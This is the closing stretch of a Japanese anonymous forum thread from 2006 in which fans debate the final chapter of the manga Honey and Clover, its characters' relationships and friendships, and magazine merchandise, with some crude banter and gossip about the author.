いろいろ決定付けたはぐの怪我も、最終回ではなかったかのように回復してるし
(自転車では右手でつかまってるものね)
みんないろいろ言い合ったり、本当は気まずいだろうことも全てクリアされていて
なんか煙に巻かれた気分。これなら自立エンドでよかったんじゃないの?
いや、これはこれで想像通りの美しい終わりなんだけどね・・・




897 :花と名無しさん:2006/07/30(日) 07:48:56 ID:???O
僕は山田さんと結婚したいんですが
どうすればいいでしょうか

彼女のウンコは太くていい形だと思うんです。

898 :花と名無しさん:2006/07/30(日) 07:52:13 ID:???0
自分もようやく最終回読んだけど
ベッタベタな終わり方だったなぁ(ハチクロサンドは予想外だったが)
なんか魂こもってないというか作者が本音で描いてない感じ。
もうすっかり気持ちは次回作の方に向いちゃってるんだろうな。

899 :花と名無しさん:2006/07/30(日) 08:12:53 ID:???O
きれいなところだけ切り取って描く同人スタイルだからね。

900 :花と名無しさん:2006/07/30(日) 08:39:47 ID:???O
山田さんみたいな女の人に片思いしてもらうためには
どうすればいいですかね?

901 :花と名無しさん:2006/07/30(日) 08:55:36 ID:???O
>>900

902 :花と名無しさん:2006/07/30(日) 09:00:38 ID:???0
>>900
死ねばいいと思うよ。

903 :花と名無しさん:2006/07/30(日) 09:01:49 ID:???0
次回作ではぜひ、キャラやカプの魅力を自力で表現してほしい。
周囲のキャラにマンセーさせたり、周囲のキャラがそれを
いかにも望んでるとかライバルが墓穴掘って墜落とか
そういう手法じゃなくて。

904 :花と名無しさん:2006/07/30(日) 09:11:29 ID:???0
>>659
森田、いい表情。
「もう会えないよ」エンドってもしかして
森はぐくっつかないのとともに、竹本と森田の決別というのも決めてたかもね。
ギャグにしないで。
ウミノさんも読者の反応見て、ある程度やらかいエンドにしたような

905 :花と名無しさん:2006/07/30(日) 09:14:02 ID:???0
誰だよ、オカ板の後味の悪い話スレまでわざわざ出張して
ご丁寧にネタバレした奴w

906 :花と名無しさん:2006/07/30(日) 09:21:25 ID:???O
>>902d!
あなたのツンデレぶりに惚れました
彼氏いますか?

僕はハチクロの中では森田に似てると言われます
だめですかね?

907 :花と名無しさん:2006/07/30(日) 09:23:41 ID:???0
>>881
それどこ情報? そしてどうでもいい??

908 :花と名無しさん:2006/07/30(日) 09:24:50 ID:???O
別冊コーラスじゃね?

909 :花と名無しさん:2006/07/30(日) 09:25:59 ID:???0
わかった、実写森田役!!
チャウ・シン・チーでどうだ!?

910 :花と名無しさん:2006/07/30(日) 09:27:45 ID:???0
森田にはぐみのことを託された修司。ふたりの進む道は・・・

はぐ修ふたりの漫画かい

911 :花と名無しさん:2006/07/30(日) 09:31:14 ID:???O
>>910
最終回みて その捉え方だけで終わるなら 終わっとるな

912 :花と名無しさん:2006/07/30(日) 09:38:54 ID:???0
チャウシンチー萌え

913 :花と名無しさん:2006/07/30(日) 10:04:58 ID:???0
ウミノさんの付録の付箋、なんでミドリちゃんなんだろ。
もっと可愛いキャラにすれば良かったのに…ウミノクマとか。

914 :花と名無しさん:2006/07/30(日) 10:26:20 ID:zSJYsqa+O
はぐが森田さんに抱いた、きづかぬ恋心は一体!?どこえ…。なんか全てが半端で…これからだって思ったのに焦りすぎ。急落下↓↓ハチクロ好きだったのに…ショーックです。違うエンドを期待してますた。

915 :花と名無しさん:2006/07/30(日) 10:29:04 ID:c/xZAyHOO
http://jbbs.livedoor.jp/bbs/i.cgi/school/10241/

916 :花と名無しさん:2006/07/30(日) 11:58:04 ID:???0
>>914
お前の日本語の方が半端だがな。

917 :花と名無しさん:2006/07/30(日) 11:59:49 ID:???O
>>913
ウミノクマか…
作者キャラがあんなにグッズになってるのって珍しいよね。
寧ろはぐとかで良くない?

918 :花と名無しさん:2006/07/30(日) 12:05:48 ID:???0
私はウミノクマは単品で考えればアリかもしれないけど、作者自画像なのを考えると勘弁して欲しい。
作者本人とか最終回までずっと登場していなかったミドリちゃんとか付録としてどうかと思う。
それならはぐの方がまだいいし、クローバーとか鳩とか一見それとわからないデザインの方がいいかな。

919 :花と名無しさん:2006/07/30(日) 12:07:37 ID:???0
リーダーのマグネットが欲しかったけどコーラスいらん〜

920 :花と名無しさん:2006/07/30(日) 12:08:38 ID:???0
>>918
あーいいね。
同じ丸いマグネットならブローチのデザインで…
ってあれ鳩だっけ。小鳥?

921 :花と名無しさん:2006/07/30(日) 12:27:46 ID:???0
男だと、終盤のはぐに母性を感じてしまうヤツもいるんじゃまいか。
とくに竹本に感情移入してるようなヤシや
ウミノさんに依存しちゃってるヤシ

922 :花と名無しさん:2006/07/30(日) 12:30:03 ID:???0
>>921
その解釈の根拠がわからん。
あれのどこに母性が感じられるというのか。

923 :花と名無しさん:2006/07/30(日) 12:32:44 ID:???0
>919
マグネットではないけどガチャでリーダーあったよ。

924 :花と名無しさん:2006/07/30(日) 12:47:47 ID:???O
>>921
いや全然
子供

925 :花と名無しさん:2006/07/30(日) 12:50:13 ID:???0
ガチャなんかあるのか…

926 :花と名無しさん:2006/07/30(日) 13:03:51 ID:???O
鍵につけられるキーカバーがガチャであった。
キーホルダーのプレートを外して鍵をつける感じだったんだけどリーダーあったかな?

927 :花と名無しさん:2006/07/30(日) 13:15:13 ID:???0
これかー!
ttp://hachikuro.net/cgi-bin/index.cgi

928 :花と名無しさん:2006/07/30(日) 13:36:13 ID:???0
ウミノクマはイラネ

929 :花と名無しさん:2006/07/30(日) 13:36:35 ID:???0
はぐはたけもとのことは見ててくれないの?

930 :花と名無しさん:2006/07/30(日) 13:53:52 ID:???O
>>895
高校時代に漫画家デビューってWikiに書いてあったけど

931 :花と名無しさん:2006/07/30(日) 14:05:59 ID:???0
>>927
それだー!

932 :花と名無しさん:2006/07/30(日) 14:27:53 ID:???O
テレビで「自分なんて探す物じゃなくて作る物でしょう」という発言に吹いたw
たけのこと臭全否定

933 :花と名無しさん:2006/07/30(日) 14:44:48 ID:???O
んと 立ち読みパラパラ見なんだが竹本とはぐの自転車のシーンのセリフ
・修ちゃんに返さなきゃいけない→なにを?
・それは違う 先生は自分で見つけられるよ あげるもんじゃない→なにを?
・ありがとう竹本くん(涙するはぐ)→なにに涙してんの?なぜありがとう?
この辺 どゆこと?

早くコミックでねえかな
少女漫画雑誌立ち読み恥ずかしかったわ

934 :花と名無しさん:2006/07/30(日) 14:47:27 ID:???0
>>932
自分を作れると思ってみんなが無理した時代のあとに、
”本当の自分”探しが流行ったんだよ

935 :花と名無しさん:2006/07/30(日) 14:53:13 ID:???0
本当の自分とか、探すとか、
自意識過剰な甘ったれがするんだよ。
きれいな言葉で自分を飾るのが大好きだからね。

936 :花と名無しさん:2006/07/30(日) 14:56:34 ID:???O
>>935
漫画だから いいんじゃね

937 :花と名無しさん:2006/07/30(日) 15:40:13 ID:???0
本気で打ち切りなんだと思ってた

938 :花と名無しさん:2006/07/30(日) 15:42:51 ID:???0
打ち切りっつうか投げたって感じだな

939 :花と名無しさん:2006/07/30(日) 15:49:20 ID:???0
投げたっていうか飽きたって感じだな

940 :花と名無しさん:2006/07/30(日) 15:51:16 ID:???0
>>939
今書こうと思っていたのとまったく同じことを先に書かれて、
びっくりした。

941 :花と名無しさん:2006/07/30(日) 16:00:15 ID:???0
流れ無視して伏線作ったくせに飽きたのかOTZ

942 :花と名無しさん:2006/07/30(日) 16:00:20 ID:???0
>>930
wikiは誰でも編集できるからねぇ。
ウミノさんは経歴(サンリオ社員、スラムダンク同人)を
隠したがっているので
ウミノさんの意向(本当の経歴を世間に知られたくない)にあわせて
信者や関係者がが編集したのかもしれない。

>>895が正しい経歴だよ。

943 :花と名無しさん:2006/07/30(日) 16:06:15 ID:???0
同人はまああれとして、サンリオ社員ってことも隠したいのかな?

944 :花と名無しさん:2006/07/30(日) 16:23:46 ID:2BPvH01S0
結局一番真山がいいやつだったな

945 :花と名無しさん:2006/07/30(日) 16:29:55 ID:???0
30後半じゃないよ、39年か40年生まれでそ膿野たん。もう四十路。

946 :花と名無しさん:2006/07/30(日) 16:47:36 ID:???0
真山擁護はやめておけ。無差別に叩かれるから。
何を思っていても「ストーカーキモい氏ね」で押し通せ。
最終的に他の面子の多くがもっとキモくなっているとしても、忘れておけ。

947 :花と名無しさん:2006/07/30(日) 16:52:48 ID:H4wdq0Sw0
>>895
商業誌の漫画はハチクロしか描いてないってことですか?
順風満帆ですね

948 :花と名無しさん:2006/07/30(日) 17:02:01 ID:???0
真山は誰にも迷惑かけずにリカのストーカーしてたんだしいいじゃん
リカだって真山にはストーカーされてたのにも関わらず感謝してるし
ストーカーのことも反省してるっぽいし
竹本と森田のほうが明らかにみんなに迷惑かけた

949 :花と名無しさん:2006/07/30(日) 17:04:40 ID:???0
真山は誰にも迷惑かけずにリカのストーカーしてたんだしいいじゃん
リカだって真山にはストーカーされてたのにも関わらず感謝してるし
真山もストーカーしてたことは反省してるっぽいし
竹本と森田のほうが明らかにみんなに迷惑かけた
山田は結果的に一番よかったなと思う
はぐが最強に可哀想

950 :花と名無しさん:2006/07/30(日) 17:06:16 ID:???0
あれ、同じPNでBL系雑誌で描いてたって話なかった?
単に同人時代と同じ名前ってだけ?

951 :花と名無しさん:2006/07/30(日) 17:07:04 ID:???O
なんだかんだいってフツーの幸せな男女のカップルって野宮と山田くらいだな

952 :花と名無しさん:2006/07/30(日) 17:08:12 ID:???0
呑み屋が一番キモメン

953 :花と名無しさん:2006/07/30(日) 17:09:07 ID:???0
ストーカーストーカーいうな!


954 :花と名無しさん:2006/07/30(日) 17:27:18 ID:???O
今更だけどハチクロの登場人物って友達の恋は全然応援しないのな。
アテクシ(オレ)せつない、つらいばっかりで。

955 :花と名無しさん :2006/07/30(日) 17:31:03 ID:???0
山田がちょっとあれだ、と言う人が多いけど、
俺は素敵だと思うな。
自己実現と恋愛をまるで混同しているところ、観念的なところが。
山田がいまいちな人は、例えば”イエスタデイをうたって”の
ハルには、まるで共感ができないのかもしれないという戯れ言

956 :花と名無しさん:2006/07/30(日) 17:33:02 ID:???0
>>954
???
お前の目は節穴かガラス玉か?

957 :花と名無しさん:2006/07/30(日) 17:40:16 ID:???O
>>956
は??だってそうじゃん。

958 :花と名無しさん:2006/07/30(日) 17:43:04 ID:???0
中盤で山田がはぐたちの心配してる場所とか色々あったような

959 :花と名無しさん:2006/07/30(日) 17:50:29 ID:???0
954ではないけど。
>>958
でも本人と話したり働きかけたりっていうのは森田→山田くらいじゃない?
真山も野宮が本格的に動いてからは野宮にまともに話してないし。

960 :花と名無しさん :2006/07/30(日) 17:54:32 ID:???0
>>957
山田と野宮をアシストしようとする美和子と山崎
竹本が入院したとき、修司の邪魔を押さえようとする山田と真山
真山が会社やめるとき、そのまま行っちまえとエールを送る野宮
つらそうな山田に何度となく声をかける森田、その度に涙する山田


961 :花と名無しさん:2006/07/30(日) 17:57:25 ID:???0
はぐは何もしてないけどね。

962 :花と名無しさん:2006/07/30(日) 17:57:46 ID:???0
はぐは山田を応援しては無かったね

963 :花と名無しさん:2006/07/30(日) 18:01:14 ID:???0
設定:はぐは人付き合いが苦手

964 :花と名無しさん:2006/07/30(日) 18:01:22 ID:???0
>>954ははぐのことなんだよ、きっと

965 :花と名無しさん:2006/07/30(日) 18:05:43 ID:2BPvH01S0
はぐぐらいの天才が森田の才能尊敬するとは思えない

966 :花と名無しさん:2006/07/30(日) 18:05:54 ID:???0
>>954は自分に都合の悪い情報が見えない子

967 :花と名無しさん :2006/07/30(日) 18:07:52 ID:???0
>>961>>962
修司以外で、誰かに何かを相談したりできるようにはぐは育っていない。
でも、森田とは、分かち合えるものがあっても。
そういうことでは?


968 :花と名無しさん:2006/07/30(日) 18:22:07 ID:???0
一緒に泊まったり住んだりしてても
女同士そんな話も出来なかったわけか・・・。

969 :花と名無しさん:2006/07/30(日) 18:24:22 ID:???0
山田からみたはぐみって
「知り合いの小さい女の子」と遊んであげる感じになりそう。
同世代の女子と対等な友達になる感じとは違うと思う。

970 :花と名無しさん :2006/07/30(日) 18:25:25 ID:???0
そして、(悪い意味でなく)はぐは自分の
そういう話ができる相手だ、と山田は思っていなかった
と考えるのが自然かと。

971 :花と名無しさん:2006/07/30(日) 18:25:40 ID:???0
相手から話してこない限り突っ込んだ恋愛とーくしなくね?
それにハグに恋愛の何を聞くよ
趣味トークするのがまだたのしそ

972 :花と名無しさん:2006/07/30(日) 18:26:02 ID:???0
対等な友達って感じじゃないよね
山田がはぐに気つかってみたいな

973 :花と名無しさん:2006/07/30(日) 18:40:18 ID:???0
>>955
> 山田がいまいちな人は、例えば”イエスタデイをうたって”の
> ハルには、まるで共感ができないのかもしれないという戯れ言

頭おかしいんじゃないの?
山田とハルに共通点なんかない。
お前が無理矢理こじつけた屁理屈世界以外では。
ハルのカラスにでもつつかれて氏ね。


974 :花と名無しさん :2006/07/30(日) 18:47:44 ID:???0
>>973
まあまあ。
自分の何を主体にして生きてるかを見れば、
まるで同じ精神だと思うけど。
じゃあ、共通点ないところ具体的に指摘してみてよ。。
と言いたいところだけど、ここではスレ違い気味かな

975 :花と名無しさん:2006/07/30(日) 18:50:06 ID:???0
普通田舎の子供って近所づきあいとかで社交的になるのに
やっぱりばあちゃんの影響か

976 :花と名無しさん:2006/07/30(日) 18:50:28 ID:???0
泣いてばっかの山田は嫌だな
何だかんだ言っても真山への想いを断ち切れないクセに飲み屋に惹かれてしまう、のは仕方ないとして
あの歳の女にしては受身過ぎる 自分の事ばっか考えてて他人をないがしろにしてる印象

977 :花と名無しさん :2006/07/30(日) 18:51:34 ID:???0
それも若さ、と言えばなにもかもOK

978 :花と名無しさん:2006/07/30(日) 18:53:53 ID:???0
山田アンチと山田ヲタはウザイな

979 :花と名無しさん:2006/07/30(日) 18:56:06 ID:???0
メガネ男子しか恋愛対象にしないのが山田 商店街の連中でもパン屋の眼鏡は特別近しい感じだし

980 :花と名無しさん :2006/07/30(日) 18:58:01 ID:???0
>>979
そ、そうだったのかーーー!お前すげえ

981 :花と名無しさん:2006/07/30(日) 18:59:27 ID:???0
なんという分析力

982 :花と名無しさん:2006/07/30(日) 18:59:51 ID:???0
>>972
結局はぐの人見知りは改善されなかったよね。
修の異様な過保護ぶりを見るたび、それじゃ直らんだろ、とは思ってたけど。
ハチクロ的には、恋愛の相談も出来ないようなうすい関係の友達しか出来ないけど
保護してくれる人がいればいいってことなんだろか。
恋愛も友情もはぐに関してはお互いに対等なものは望めないような気がしてきた。

983 :982:2006/07/30(日) 19:01:23 ID:???0
あっ、流れぶった切ってごめん。
話は山田のメガネ萌えに移ってた・・・orz

984 :花と名無しさん:2006/07/30(日) 19:02:11 ID:???0
かまうこたねぇ!やっちまえ!

985 :花と名無しさん:2006/07/30(日) 19:02:38 ID:???0
恋愛相談が友情のバロメーターってのも
相当な少女漫画脳だなぁ

986 :花と名無しさん :2006/07/30(日) 19:04:06 ID:???0
>>985完全に同意。
   誰と誰がくっつくかとか、応援するとか邪魔するとかばっかか

987 :花と名無しさん:2006/07/30(日) 19:04:26 ID:???0
結局5人は実はあんまり仲良くなかったのかもね
仲いいと思い込んでただけでさ
普通に考えたら絆崩壊する要素ありすぎてる
それが綱渡りで繋がってたのが「奇跡のような時間」

988 :花と名無しさん:2006/07/30(日) 19:06:18 ID:???0
>>985-986
漫画の中だけが情報源な人種と予想>少女漫画脳
或いは、やっぱリアじゃね?

989 :花と名無しさん:2006/07/30(日) 19:07:01 ID:???0
真山とはぐは二人きりになったら間が持たなそう
ってかこいつら仲良しではないよな 飯がらみで抱きついた事はあったが

990 :花と名無しさん:2006/07/30(日) 19:08:11 ID:???0
判定はちゅーしたら仲良しとかそんな感じか

991 :花と名無しさん:2006/07/30(日) 19:09:11 ID:???0
いや、単純に二人のやりとりというか絡んでたシーンの記憶があまりないから

992 :花と名無しさん:2006/07/30(日) 19:09:53 ID:???0
>>989
それ思った
真山とハグミが話してるシーンあんま(全然?)ない


993 :花と名無しさん:2006/07/30(日) 19:10:35 ID:???0
>>969>>972に同意なだけ。
別に恋愛話だけが基準じゃないよ。
学生時代の本当の友達、ってことを考えたら
やはり心のうちをある程度さらけ出すものじゃないかと。

994 :花と名無しさん:2006/07/30(日) 19:11:06 ID:???0
真山→はぐ 難しい子
はぐ→真山 死んでる・・・

995 :花と名無しさん :2006/07/30(日) 19:12:43 ID:???0
>>993
ttp://www2s.biglobe.ne.jp/~t_tajima/my-f/my-f7.htm

996 :花と名無しさん:2006/07/30(日) 19:13:13 ID:???0
まぁ真山はロリじゃなさそうだし、他人の才能にもごく普通にすごいなぁくらいの感情しか抱かなそうだからな
はぐに大した興味持たなくても普通だな

997 :花と名無しさん:2006/07/30(日) 19:15:21 ID:???0
少なくとも友達の友達くらいの感覚ではあるだろ

998 :花と名無しさん:2006/07/30(日) 19:16:09 ID:???0
>>997
それで仲良し五人組ってのは無理あるだろw

999 :花と名無しさん:2006/07/30(日) 19:18:33 ID:???0
そうか?
温泉に一緒にいくくらいだし
仲良しじゃん
リアルなら「○○達いっつも一緒だね〜仲良しだね〜」
みたく言われるような仲だろw

「いいえ?」

とでも言わせる気かw

1000 :花と名無しさん:2006/07/30(日) 19:18:41 ID:RbQzVXOPO
はぐ氏ね

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

217 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)